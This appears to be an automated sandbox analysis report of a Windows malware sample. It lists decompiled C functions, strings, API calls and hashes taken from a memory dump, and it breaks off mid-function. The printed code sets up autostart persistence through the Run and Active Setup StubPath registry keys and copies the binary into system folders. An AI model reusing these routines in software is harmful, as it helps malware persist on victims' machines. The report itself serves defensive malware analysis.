0x10009e77
0x10009e7c
0x10009e7c
0x10009e7e
0x10009e80
0x10009e80
0x10009e83
0x10009e84
0x10009e87
0x10009e96
0x10009e9c
0x10009ea3
0x10009ea4
0x10009ea9
0x10009eac
0x10009eb6
0x10009ebc
0x10009ec3
0x10009edc
0x10009ef1
0x10009ef1
0x10009ef6
0x10009efd
0x10009f16
0x10009f2b
0x10009f2b
0x10009f30
0x10009f37
0x10009f4e
0x10009f64
0x10009f74
0x10009f87
0x10009fa6
0x10009fbc
0x10009fd1
0x10009fd1
0x10009fd6
0x10009fdd
0x10009ff4
0x1000a004
0x1000a009
0x1000a014
0x1000a019
0x1000a02a
0x1000a02c
0x1000a02c
0x1000a03c
0x1000a05d
0x1000a079
0x1000a081
0x1000a099
0x1000a0b8
0x1000a0c8
0x1000a0c8
0x10009fdd
0x1000a0cf
0x1000a0d2
0x1000a0d5
0x1000a0e5
0x1000a0f0
0x1000a100
0x1000a112

Strings

%SERVER%, xrefs: 10009FFF
StubPath, xrefs: 10009FC7
restart, xrefs: 10009F7F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009EE7, 10009F21
Software\Microsoft\Active Setup\Installed Components\, xrefs: 10009F5F, 10009FB7

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateFreeStringValue
String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
API String ID: 523044198-2142522223
Opcode ID: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
Instruction ID: 7bb9cab796adacb123c590501e10766ab110edc906df9b0df81ab3aad42e102a
Opcode Fuzzy Hash: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
Instruction Fuzzy Hash: 23619438A0415D9BEB25C750C881BDEB3BEEF45380F8081D6A908A764ADB756F85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10009E74, Relevance: 6.4, Strings: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10009E74(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void _v1264;
				char _v1386;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1634;
				char _v1756;
				char _v1878;
				char _v1880;
				void _v5028;
				char _v5032;
				char _v5036;
				char _v5040;
				char _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				char _v5060;
				void _v5184;
				char _v5188;
				char _v5192;
				void* _t87;
				void* _t125;
				intOrPtr _t151;
				void* _t187;
				void* _t188;
				void* _t196;

				_t123 = __ebx;
				_t187 = _t188;
				_t125 = 0x288;
				do {
					_push(0);
					_push(0);
					_t125 = _t125 - 1;
				} while (_t125 != 0);
				_push(_t125);
				_push(__ebx);
				_t185 = __edx;
				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
				E10003C28( &_v8);
				_push(_t187);
				_push(0x1000a113);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188 + 0xc;
				if(_v1880 != 0) {
					_t193 = _v1512 - 1;
					if(_v1512 == 1) {
						E100038E0( &_v5032, 0x3d,  &_v1878);
						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t193, 2, _v8);
					}
					_t194 = _v1511 - 1;
					if(_v1511 == 1) {
						E100038E0( &_v5036, 0x3d,  &_v1756);
						E1000577C(0x80000001, _t123, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t185, _t194, 2, _v8);
					}
					_t195 = _v1510 - 1;
					if(_v1510 == 1) {
						E100038E0( &_v5044, 0x3d,  &_v1634);
						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
						E100059E8(0x80000001, _t123, _v5040, _t195);
						E10003988( &_v5048, L" restart", _v8, _t195);
						E100038E0( &_v5056, 0x3d,  &_v1634);
						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t195);
						E1000577C(0x80000002, _t123, L"StubPath", _v5052, _t185, _t195, 2, _v5048);
					}
					_t196 = _v1509 - 1;
					if(_t196 == 0) {
						E100034B0( &_v5060, 0x3d,  &_v1264);
						E1000362C(_v5060, "%SERVER%");
						if(_t196 == 0) {
							E10005240(_v8, _t123, 0x3d,  &_v5184);
							_t185 =  &_v5184;
							memcpy( &_v1264,  &_v5184, 0x1e << 2);
							asm("movsw");
						}
						E100038E0( &_v16, 0x3d,  &_v1508);
						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
						_t87 = E10005A94(_v12, _t123, _t83);
						E100038E0( &_v5188, 0x3d,  &_v1264);
						E100038E0( &_v5192, 0x3d,  &_v1386);
						E1000577C(_t87, _t87, _v5192, _v16, _t185, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
					}
				}
				_pop(_t151);
				 *[fs:eax] = _t151;
				_push(E1000A11A);
				E10003788( &_v5192, 2);
				E100032CC( &_v5060);
				E10003788( &_v5056, 7);
				return E10003788( &_v16, 3);
			}

0x10009e74
0x10009e75
0x10009e77
0x10009e7c
0x10009e7c
0x10009e7e
0x10009e80
0x10009e80
0x10009e83
0x10009e84
0x10009e87
0x10009e96
0x10009e9c
0x10009ea3
0x10009ea4
0x10009ea9
0x10009eac
0x10009eb6
0x10009ebc
0x10009ec3
0x10009edc
0x10009ef1
0x10009ef1
0x10009ef6
0x10009efd
0x10009f16
0x10009f2b
0x10009f2b
0x10009f30
0x10009f37
0x10009f4e
0x10009f64
0x10009f74
0x10009f87
0x10009fa6
0x10009fbc
0x10009fd1
0x10009fd1
0x10009fd6
0x10009fdd
0x10009ff4
0x1000a004
0x1000a009
0x1000a014
0x1000a019
0x1000a02a
0x1000a02c
0x1000a02c
0x1000a03c
0x1000a05d
0x1000a079
0x1000a081
0x1000a099
0x1000a0b8
0x1000a0c8
0x1000a0c8
0x10009fdd
0x1000a0cf
0x1000a0d2
0x1000a0d5
0x1000a0e5
0x1000a0f0
0x1000a100
0x1000a112

Strings

%SERVER%, xrefs: 10009FFF
StubPath, xrefs: 10009FC7
restart, xrefs: 10009F7F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009EE7, 10009F21
Software\Microsoft\Active Setup\Installed Components\, xrefs: 10009F5F, 10009FB7

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateFreeStringValue
String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
API String ID: 523044198-2142522223
Opcode ID: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
Instruction ID: 51db14d9a78096dfca6e0b2c0cac839b55e5a7d9a5be764b8c5632986f08cd1f
Opcode Fuzzy Hash: 6a3a9802c04267f5677fb71fa8e26ddd48aad684d5027258f0195948b13e5c11
Instruction Fuzzy Hash: B5619338A0415D9BEB15D750C841BDEB3BEEF45380F8081E6A908A7249DB75AF85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10008270, Relevance: 6.3, Strings: 5, Instructions: 93COMMON

Download Yara Rule

Strings

, xrefs: 10008347
&, xrefs: 100082FF
<, xrefs: 10008311
", xrefs: 10008335
>, xrefs: 10008323

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &$>$<$"$
API String ID: 0-2730314969
Opcode ID: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
Instruction ID: c2b4ba650b709cafa3e4efc2b6e91a51004f46039d2a3ae5a547a61f7c415082
Opcode Fuzzy Hash: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
Instruction Fuzzy Hash: 57314579A04189AFEF05DB94CC819DF77FDFB88680F509061F180A7209DA34AF028B65

Uniqueness

Uniqueness Score: -1.00%

Function 100099F8, Relevance: 6.3, APIs: 4, Instructions: 265
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E100099F8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				intOrPtr _v2000;
				char _v2124;
				char _v2246;
				char _v2248;
				void _v5020;
				char _v5024;
				char _v5028;
				char _v5032;
				char _v5556;
				char _v5560;
				char _v5564;
				char _v5568;
				char _v5572;
				char _v5576;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char _v5608;
				char _v5612;
				char _v5616;
				char _v5620;
				char _v5624;
				char _v5628;
				void* _t99;
				intOrPtr _t120;
				void* _t131;
				WCHAR* _t144;
				int _t147;
				void* _t163;
				int _t177;
				intOrPtr _t220;
				void* _t224;
				intOrPtr _t254;
				void* _t291;
				void* _t293;
				WCHAR* _t294;
				void* _t296;
				void* _t297;
				intOrPtr _t302;

				_t296 = _t297;
				_t220 = 0x2be;
				do {
					_push(0);
					_push(0);
					_t220 = _t220 - 1;
				} while (_t220 != 0);
				_push(_t220);
				_t1 =  &_v8;
				 *_t1 = _t220;
				_t293 = __edx;
				_push( *_t1);
				_t99 = memcpy( &_v5020, __edx, 0x4e4 << 2);
				_t291 = _t293 + 0x9c8;
				_pop(_t224);
				_t218 = _t224;
				_v8 = _t99;
				E10003C28( &_v8);
				_push(_t296);
				_push(0x10009e5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t297 + 0xc;
				E100037AC(_t224, _v8);
				if(_v2248 == 0) {
					L28:
					_pop(_t254);
					 *[fs:eax] = _t254;
					_push(E10009E65);
					E10003788( &_v5628, 7);
					E100032CC( &_v5600);
					E10003788( &_v5596, 8);
					E100032CC( &_v5564);
					E10003770( &_v5560);
					E10003788( &_v5032, 3);
					return E10003788( &_v12, 2);
				} else {
					_t120 = _v2000;
					_t301 = _t120;
					if(_t120 != 0) {
						__eflags = _t120 - 1;
						if(__eflags != 0) {
							__eflags = _t120 - 2;
							if(__eflags != 0) {
								__eflags = _t120 - 3;
								if(_t120 != 3) {
									__eflags = _t120 - 4;
									if(_t120 != 4) {
										__eflags = _t120 - 5;
										if(_t120 == 5) {
											E10005324( &_v12);
										}
									} else {
										E10005664( &_v5556);
										E100038E0( &_v5560, 0x105,  &_v5556);
										E10003988( &_v12, E10009E70, _v5560, __eflags);
									}
								} else {
									E10005638( &_v5024, _t291, _t293);
									__eflags = 0;
									E10003A34(_v5024, 0);
									if(__eflags == 0) {
										E10005664( &_v5556);
										E100038E0( &_v5032, 0x105,  &_v5556);
										E10003988( &_v12, E10009E70, _v5032, __eflags);
									} else {
										E10005638( &_v5028, _t291, _t293);
										E10003988( &_v12, E10009E70, _v5028, __eflags);
									}
								}
							} else {
								E10005460( &_v12, _t218, _t224, __eflags);
							}
						} else {
							E100053D8( &_v12, _t218, __eflags);
						}
					} else {
						E10005350( &_v12, _t218, _t301);
					}
					E100034B0( &_v5564, 0x3d,  &_v2124);
					_t302 = _v5564;
					if(_t302 != 0) {
						_push(_v12);
						E100038E0( &_v5568, 0x3d,  &_v2124);
						_push(_v5568);
						_push(E10009E70);
						E100039EC();
					}
					E100038E0( &_v5576, 0x3d,  &_v2246);
					E10003988( &_v5572, _v5576, _v12, _t302);
					E10003A34(_v8, _v5572);
					if(_t302 != 0) {
						_t131 = E10005690(E1000390C(_v12));
						_t303 = _t131;
						if(_t131 != 0) {
							E100038E0( &_v5584, 0x3d,  &_v2246);
							E10003988( &_v5580, _v5584, _v12, _t303);
							SetFileAttributesW(E1000390C(_v5580), 0x80);
							E100038E0( &_v5592, 0x3d,  &_v2246);
							E10003988( &_v5588, _v5592, _v12, _t303);
							_t144 = E1000390C(_v5588);
							_t294 = E1000390C(_v8);
							_t147 = CopyFileW(_t294, _t144, 0);
							asm("sbb eax, eax");
							_t305 = _t147 + 1;
							if(_t147 + 1 != 0) {
								E100038E0( &_v5628, 0x3d,  &_v2246);
								E10003988(_t218, _v5628, _v12, __eflags);
							} else {
								E10005664( &_v5556);
								E100038E0( &_v5596, 0x105,  &_v5556);
								E10003988( &_v12, E10009E70, _v5596, _t305);
								E100034B0( &_v5600, 0x3d,  &_v2124);
								if(_v5600 != 0) {
									_push(_v12);
									E100038E0( &_v5604, 0x3d,  &_v2124);
									_push(_v5604);
									_push(E10009E70);
									E100039EC();
								}
								_t163 = E10005690(E1000390C(_v12));
								_t307 = _t163;
								if(_t163 != 0) {
									E100038E0( &_v5612, 0x3d,  &_v2246);
									E10003988( &_v5608, _v5612, _v12, _t307);
									SetFileAttributesW(E1000390C(_v5608), 0x80);
									E100038E0( &_v5620, 0x3d,  &_v2246);
									E10003988( &_v5616, _v5620, _v12, _t307);
									_t177 = CopyFileW(_t294, E1000390C(_v5616), 0);
									asm("sbb eax, eax");
									_t309 = _t177 + 1;
									if(_t177 + 1 != 0) {
										E100038E0( &_v5624, 0x3d,  &_v2246);
										E10003988(_t218, _v5624, _v12, _t309);
									}
								}
							}
						}
					}
					goto L28;
				}
			}

0x100099f9
0x100099fc
0x10009a01
0x10009a01
0x10009a03
0x10009a05
0x10009a05
0x10009a08
0x10009a09
0x10009a09
0x10009a0f
0x10009a17
0x10009a1d
0x10009a1d
0x10009a1f
0x10009a20
0x10009a22
0x10009a28
0x10009a2f
0x10009a30
0x10009a35
0x10009a38
0x10009a40
0x10009a4c
0x10009df2
0x10009df4
0x10009df7
0x10009dfa
0x10009e0a
0x10009e15
0x10009e25
0x10009e30
0x10009e3b
0x10009e4b
0x10009e5d
0x10009a52
0x10009a52
0x10009a58
0x10009a5a
0x10009a69
0x10009a6c
0x10009a7b
0x10009a7e
0x10009a8d
0x10009a90
0x10009b02
0x10009b05
0x10009b3d
0x10009b40
0x10009b45
0x10009b45
0x10009b07
0x10009b0d
0x10009b23
0x10009b36
0x10009b36
0x10009a92
0x10009a98
0x10009aa3
0x10009aa5
0x10009aaa
0x10009ad2
0x10009ae8
0x10009afb
0x10009aac
0x10009ab2
0x10009ac5
0x10009ac5
0x10009aaa
0x10009a80
0x10009a83
0x10009a83
0x10009a6e
0x10009a71
0x10009a71
0x10009a5c
0x10009a5f
0x10009a5f
0x10009b5b
0x10009b60
0x10009b67
0x10009b69
0x10009b7d
0x10009b82
0x10009b88
0x10009b95
0x10009b95
0x10009bab
0x10009bbf
0x10009bcd
0x10009bd2
0x10009be0
0x10009be5
0x10009be7
0x10009c03
0x10009c17
0x10009c28
0x10009c40
0x10009c54
0x10009c5f
0x10009c6d
0x10009c70
0x10009c78
0x10009c7b
0x10009c7d
0x10009ddd
0x10009ded
0x10009c83
0x10009c89
0x10009c9f
0x10009cb2
0x10009cc8
0x10009cd4
0x10009cd6
0x10009cea
0x10009cef
0x10009cf5
0x10009d02
0x10009d02
0x10009d0f
0x10009d14
0x10009d16
0x10009d32
0x10009d46
0x10009d57
0x10009d6f
0x10009d83
0x10009d95
0x10009d9d
0x10009da0
0x10009da2
0x10009db5
0x10009dc5
0x10009dc5
0x10009da2
0x10009d16
0x10009c7d
0x10009be7
0x00000000
0x10009bd2

APIs

SetFileAttributesW.KERNEL32(00000000,00000080), ref: 10009C28
CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,00000080), ref: 10009C70
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,00000000,00000000,00000000,00000000,00000080), ref: 10009D57
CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,00000080,?,?,?,?,00000000,00000000,00000000,00000000,00000080), ref: 10009D95

Part of subcall function 100053D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 10005406

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCopy$DirectorySystem
String ID:
API String ID: 3443914049-0
Opcode ID: 8ffb02acb12784a8fca7f00c8f7b14851c1630e5a7bcf1fe24323b8a2b1ac29b
Instruction ID: 24b82f3418a54abe61ddf0e4c7a52c3359c66f211f63a1d8d7c84fd7e5013851
Opcode Fuzzy Hash: 8ffb02acb12784a8fca7f00c8f7b14851c1630e5a7bcf1fe24323b8a2b1ac29b
Instruction Fuzzy Hash: 02B12F3890455DDBEB21DB50CC81ADEB3B9EF803C1F4081E5A44AAB289DB71AF85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000553C, Relevance: 6.1, APIs: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000553C(void* __eax, void* __ebx, char __ecx, char __edx, void* __esi, intOrPtr* _a4, char _a8) {
				char _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				intOrPtr _t67;
				signed int _t70;
				void* _t74;
				short* _t75;
				void* _t78;
				long _t81;

				_v12 = __ecx;
				_v8 = __edx;
				_t74 = __eax;
				_t61 = _a4;
				E10003C28( &_v8);
				E10003C28( &_v12);
				E10003C28( &_a8);
				_push(_t78);
				_push(0x10005628);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffffec;
				E100037AC(_a4, _a8);
				if(RegOpenKeyExW(_t74, E1000390C(_v8), 0, 1,  &_v16) == 0) {
					_t75 = E1000390C(_v12);
					_t81 = RegQueryValueExW(_v16, _t75, 0,  &_v20, 0,  &_v24);
					if(_t81 == 0) {
						_t70 = _v24 >> 1;
						if(_t81 < 0) {
							asm("adc edx, 0x0");
						}
						E10003BE4(_t61, _t70);
						RegQueryValueExW(_v16, _t75, 0,  &_v20, E1000390C( *_t61),  &_v24);
						E10003BE4(_t61, E1000391C( *_t61) - 1);
					}
					RegCloseKey(_v16);
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E1000562F);
				E10003788( &_v12, 2);
				return E10003770( &_a8);
			}

0x10005544
0x10005547
0x1000554a
0x1000554c
0x10005552
0x1000555a
0x10005562
0x10005569
0x1000556a
0x1000556f
0x10005572
0x1000557a
0x10005598
0x100055ae
0x100055ba
0x100055bc
0x100055c1
0x100055c3
0x100055c5
0x100055c5
0x100055ca
0x100055e6
0x100055f7
0x100055f7
0x10005600
0x10005600
0x10005607
0x1000560a
0x1000560d
0x1000561a
0x10005627

APIs

Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 10005591
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 100055B5
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 100055E6
RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834), ref: 10005600

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocQueryStringValue$CloseOpen
String ID:
API String ID: 1380265509-0
Opcode ID: 44f5328e4876b6f52479c3c45a49cad434a2d2e4ded6db1d1893a13467945e67
Instruction ID: 9e8535e9bd190b0497b11441725f9f23fe9a8eb8553ebcc7748c6e293a187153
Opcode Fuzzy Hash: 44f5328e4876b6f52479c3c45a49cad434a2d2e4ded6db1d1893a13467945e67
Instruction Fuzzy Hash: 3621FC75A04618ABFB01DBA8CC82EAF77ECEF44280F518561B504E7259EB71EE048B55

Uniqueness

Uniqueness Score: -1.00%

Function 10006510, Relevance: 6.1, APIs: 4, Instructions: 77
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10006510(intOrPtr __ecx, char __edx, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct _WNDCLASSW _v61;
				void* __ebp;
				void* _t23;
				intOrPtr _t24;
				void* _t43;
				void* _t47;
				intOrPtr _t48;
				char _t50;
				void* _t54;
				void* _t55;

				_t50 = __edx;
				_t48 = __ecx;
				if(__edx != 0) {
					_t55 = _t55 + 0xfffffff0;
					_t23 = E10002A34(_t23, _t54);
				}
				_v5 = _t50;
				_t47 = _t23;
				_t24 = _a4;
				 *((intOrPtr*)(_t47 + 0xc)) = _t48;
				_v61.style = 0;
				if(_t24 != 0) {
					_v61.lpfnWndProc = _t24;
				} else {
					_v61.lpfnWndProc = E100064F4;
				}
				_v61.cbClsExtra = 0;
				_v61.cbWndExtra = 0;
				_v61.hInstance = 0;
				_v61.hIcon = 0;
				_v61.hCursor = 0;
				_v61.hbrBackground = 0;
				_v61.lpszMenuName = 0;
				_t53 = _t48;
				_v61.lpszClassName = _t48;
				GetWindowRect(GetDesktopWindow(),  &_v21);
				 *((intOrPtr*)(_t47 + 8)) = GetModuleHandleA(0);
				RegisterClassW( &_v61);
				_t20 = _t47 + 8; // 0xc08b7463
				 *((intOrPtr*)(_t47 + 4)) = E10005148(0x80, _t53, 0,  *_t20, 0, 0, 0, 0, _v21.bottom, _v21.right, 0x98000000);
				_t43 = _t47;
				if(_v5 != 0) {
					E10002A8C(_t43);
					_pop( *[fs:0x0]);
				}
				return _t47;
			}

0x10006510
0x10006510
0x1000651a
0x1000651c
0x1000651f
0x1000651f
0x10006524
0x10006527
0x10006529
0x1000652c
0x10006531
0x10006536
0x10006542
0x10006538
0x1000653d
0x1000653d
0x10006547
0x1000654c
0x10006551
0x10006556
0x1000655b
0x10006560
0x10006565
0x10006568
0x1000656a
0x10006577
0x10006583
0x1000658a
0x100065a4
0x100065bb
0x100065be
0x100065c4
0x100065c6
0x100065cb
0x100065d2
0x100065dc

APIs

GetDesktopWindow.USER32 ref: 10006571
GetWindowRect.USER32 ref: 10006577
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?), ref: 1000657E
RegisterClassW.USER32 ref: 1000658A

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$ClassDesktopHandleModuleRectRegister
String ID:
API String ID: 805957598-0
Opcode ID: a1c04505e5f5ba05ad93ee47a5be074ea14fb600836cbdd66e1b4b0242f25109
Instruction ID: fd61cd8fe43509876bed775ba568f59b673aa19b24296d0bc6aff4bc23203f03
Opcode Fuzzy Hash: a1c04505e5f5ba05ad93ee47a5be074ea14fb600836cbdd66e1b4b0242f25109
Instruction Fuzzy Hash: AB2147B1F44205AFEB50CFB8DC41B9FB7E6EB08291F108075F508EB285E97195048794

Uniqueness

Uniqueness Score: -1.00%

Function 1000ACD4, Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000ACD4(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x1000f654; // 0x10000000
				 *0x1000e0d0 = _t6;
				_t8 =  *0x1000e0e4; // 0x1000ac04
				_t9 =  *0x1000f654; // 0x10000000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L10004FE0 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x1000f654; // 0x10000000
						_t20 =  *0x1000e0e4; // 0x1000ac04
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x1000e0c0);
				}
				_t13 =  *0x1000f654; // 0x10000000
				_t24 =  *0x1000e0e4; // 0x1000ac04
				_t22 = E100050F0(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E1000AC3C(_a4, _a8));
				}
				return _t22;
			}

0x1000acdb
0x1000ace0
0x1000ace9
0x1000acef
0x1000acf5
0x1000acfd
0x1000acff
0x1000ad02
0x1000ad10
0x1000ad12
0x1000ad18
0x1000ad1e
0x1000ad1e
0x1000ad28
0x1000ad28
0x1000ad3e
0x1000ad4b
0x1000ad5b
0x1000ad62
0x1000ad73
0x1000ad73
0x1000ad7e

APIs

GetClassInfoA.USER32 ref: 1000ACF5
UnregisterClassA.USER32 ref: 1000AD1E
RegisterClassA.USER32 ref: 1000AD28
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1000AD73

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 34ace1d3d250000ade5f731cbe714df2434c88e76e583f532eec8fd86c63c607
Instruction ID: a184255e0aa6b19b8a700ba1ba5d869a571dd8ac557c0204472f9db7938aee9a
Opcode Fuzzy Hash: 34ace1d3d250000ade5f731cbe714df2434c88e76e583f532eec8fd86c63c607
Instruction Fuzzy Hash: DE01C4716041146BFB40DBA8CC91FAE33ADE7193C1F004722F505E76ADCA76EC848790

Uniqueness

Uniqueness Score: -1.00%

Function 10001840, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10001840() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E100018F6);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x1000f5b8);
				L10001194();
				if( *0x1000f039 != 0) {
					_push(0x1000f5b8);
					L1000119C();
				}
				E10001204(0x1000f5d8);
				E10001204(0x1000f5e8);
				E10001204(0x1000f614);
				 *0x1000f610 = LocalAlloc(0, 0xff8);
